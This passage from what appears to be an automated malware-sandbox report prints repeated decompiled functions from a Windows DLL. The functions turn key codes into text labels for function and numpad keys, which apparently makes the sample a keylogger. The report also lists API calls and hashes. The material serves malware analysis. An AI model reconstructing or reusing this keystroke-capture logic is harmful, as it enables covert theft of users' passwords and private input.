                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F13]
                  • API String ID: 783433895-1055728173
                  • Opcode ID: 55794011ea89da0739b276c20e738cabb44d155302fcc1f045d1e4b9aea512c3
                  • Instruction ID: 7717c9acb7a48c1fd9aa5c525c440081627dfa369ae28c64501c57b8f83c06ce
                  • Opcode Fuzzy Hash: 55794011ea89da0739b276c20e738cabb44d155302fcc1f045d1e4b9aea512c3
                  • Instruction Fuzzy Hash: 0131C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100073ED(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F14]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F14]
                  • API String ID: 783433895-1907143914
                  • Opcode ID: 203ad46c11f461d6459dc7cfca51af08d8e7ecda52987724564deb56dbc02e20
                  • Instruction ID: 7a25b7b709d0a6fd19846fba783c816f7393c35fd42baf023038af521e89d6ec
                  • Opcode Fuzzy Hash: 203ad46c11f461d6459dc7cfca51af08d8e7ecda52987724564deb56dbc02e20
                  • Instruction Fuzzy Hash: 6831C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100073FE(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F15]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F15]
                  • API String ID: 783433895-1756857771
                  • Opcode ID: f8b9d19cacf00eabcfa74d6abe32546b7e715af37a9aab5616ce0c298a08cd1d
                  • Instruction ID: a3abf2809a5496e46b19b8e66a7b892f1753b03d83a72077e8ed13536b214ed3
                  • Opcode Fuzzy Hash: f8b9d19cacf00eabcfa74d6abe32546b7e715af37a9aab5616ce0c298a08cd1d
                  • Instruction Fuzzy Hash: 9531C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECAB8EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E1000740F(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F16]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F16]
                  • API String ID: 783433895-1134220904
                  • Opcode ID: 8801c05138b566acd2804adc7f16252f9de8661d5aa877f6d0b8586ef6fde810
                  • Instruction ID: 9ded0a974e7829e14449a0db8178bd5f1510f0ab5ff1090cc1a9a41416e86c25
                  • Opcode Fuzzy Hash: 8801c05138b566acd2804adc7f16252f9de8661d5aa877f6d0b8586ef6fde810
                  • Instruction Fuzzy Hash: 2831C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007420(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F17]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                  • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F17]
                  • API String ID: 783433895-1518462761
                  • Opcode ID: 89e69890d16f782e70caca9f1ed976a7ef2713fc690923ff71a1332dafe3380d
                  • Instruction ID: 2ed4a8681e7407375f66ccd48db4609f3149d056e008a571d680b5df1c264ba8
                  • Opcode Fuzzy Hash: 89e69890d16f782e70caca9f1ed976a7ef2713fc690923ff71a1332dafe3380d
                  • Instruction Fuzzy Hash: 8231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007431(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F18]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                  • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F18]
                  • API String ID: 783433895-3709467622
                  • Opcode ID: 6d6948c150d618c0e6ff589f068a60c306c83d8aae76315f58b2b8978f8f552d
                  • Instruction ID: 149d1606a04f5e631dce96eb90406079d1e697c39fef19b4217db4c894f8743d
                  • Opcode Fuzzy Hash: 6d6948c150d618c0e6ff589f068a60c306c83d8aae76315f58b2b8978f8f552d
                  • Instruction Fuzzy Hash: 2C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C4A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007442(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F19]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                  • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
